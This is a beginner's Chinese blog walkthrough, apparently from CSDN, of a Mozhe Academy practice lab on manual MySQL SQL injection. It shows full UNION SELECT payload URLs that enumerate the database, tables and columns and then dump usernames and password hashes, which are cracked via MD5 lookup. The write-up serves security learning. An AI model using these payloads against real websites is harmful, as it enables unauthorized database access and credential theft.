1,打开靶场环境
我一开始还弱智的以为这是摸着学院的账号密码登录hhh… 然而并不是
然后发现下面有一行滚动的公告
为啥他会滚动呢。。有点好奇,用f12查看一下源文件(虽然看不懂源码,但,,还是想看看,哈哈这就是对未知的好奇吧)
然后用控制台发现这个有点好玩,是一个可以在页面移动的一个额不知道是啥名字
我就i是单纯的想看看。。
然后单机公告能进入一个页面,恩,这应该就是考验手工注入漏洞测试的页面了。。
好吧,我承认是问了度娘才知道的。。
进入正题
分割线------------------------------------------------------------------------------------------
------------------ ------------------ ------------------ ------------------ ------------------
首先,在网址后加and 1=1,and 1=2检测是否存在手工sql注入漏洞
加上and 1=2 时页面发生错误,这说明存在sql注入漏洞点2(sql注入说白了就是对于数据库的查询没有进行防护过滤,攻击者通过构造sql查询语句,达到查看数据库信息的一种方式。这句话转载于https://blog.csdn.net/weixin_43221560/article/details/91902122感谢小刚127.0.0.1大佬的博客分享。像我一样的0基础小白可以多利用网上的资源进行自我学习,要是能有人带,恩更好,但自学的能力培养我觉得是非常重要的,希望大家都能掌握这种终身收益的学习方法,这样我们就离不开度娘了,手动滑稽。)
然后进行order by从1开始查询,查询到5的时候发现页面发生错误,可知字段不大于5,可谓下面的手动爆破环节提供依据。
使用联合查询
union,确定回显位置。http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,2,3,4
接着确定数据库
http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,%20database(),3,4
获取表名
http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,%20group_concat(table_name),3,4%20from%20information_schema.TABLES%20where%20table_schema=%27mozhe_Discuz_StormGroup%27
然后获取字段名
http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,%20group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name%20=%20%27StormGroup_member%27
接着就可以获取用户名、密码
http://219.153.49.228:44098/new_list.php?id=-1%20union%20select%201,%20group_concat(name),group_concat(password),4%20from%20StormGroup_member
最后得到两个账户和密码,分别用MD5解码,
第一个错误
第二个正确,获取密码
墨者学院SQL手工注入漏洞测试(MYSQL数据库)
最新推荐文章于 2022-04-12 00:03:33 发布
本文通过墨者学院的靶场环境,详细介绍了如何检测和利用SQL手工注入漏洞。通过添加and条件和order by查询,确定了存在SQL注入,并通过联合查询逐步揭示了数据库名、表名、字段名,最终获取了用户账户和密码。
摘要由CSDN通过智能技术生成